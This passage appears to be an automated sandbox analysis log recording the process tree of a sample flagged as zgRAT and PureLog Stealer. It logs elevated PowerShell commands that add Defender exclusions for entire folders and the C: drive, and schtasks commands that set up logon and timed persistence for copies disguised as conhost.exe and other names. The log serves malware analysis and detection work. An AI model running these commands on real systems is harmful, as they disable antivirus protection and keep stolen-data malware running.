                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:25
                                                                                        Start time:12:07:05
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:26
                                                                                        Start time:12:07:06
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:27
                                                                                        Start time:12:07:06
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 9 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:28
                                                                                        Start time:12:07:06
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:29
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:30
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Recovery\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Recovery\conhost.exe
                                                                                        Imagebase:0x840000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 71%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:31
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:32
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:33
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:34
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:35
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:36
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe"
                                                                                        Imagebase:0x6b0000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 71%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:38
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                                                                                        Imagebase:0x440000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 71%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:39
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:40
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:41
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:42
                                                                                        Start time:12:07:09
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:43
                                                                                        Start time:12:07:09
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
                                                                                        Imagebase:0x7ff7f9870000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:44
                                                                                        Start time:12:07:10
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:45
                                                                                        Start time:12:07:11
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Program Files\Google\Chrome\Application\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\conhost.exe"
                                                                                        Imagebase:0x770000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 71%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:46
                                                                                        Start time:12:07:11
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0x7ff64f7b0000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:47
                                                                                        Start time:12:07:14
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:ping -n 10 localhost
                                                                                        Imagebase:0x7ff64cd50000
                                                                                        File size:22'528 bytes
                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:48
                                                                                        Start time:12:07:15
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                        Imagebase:0x7ff693ab0000
                                                                                        File size:496'640 bytes
                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:52
                                                                                        Start time:12:07:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
                                                                                        Imagebase:0x950000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:55
                                                                                        Start time:12:07:29
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                                                                                        Imagebase:0x7ff7f9870000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:56
                                                                                        Start time:12:07:29
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:57
                                                                                        Start time:12:07:29
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                                                                                        Imagebase:0x540000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:60
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
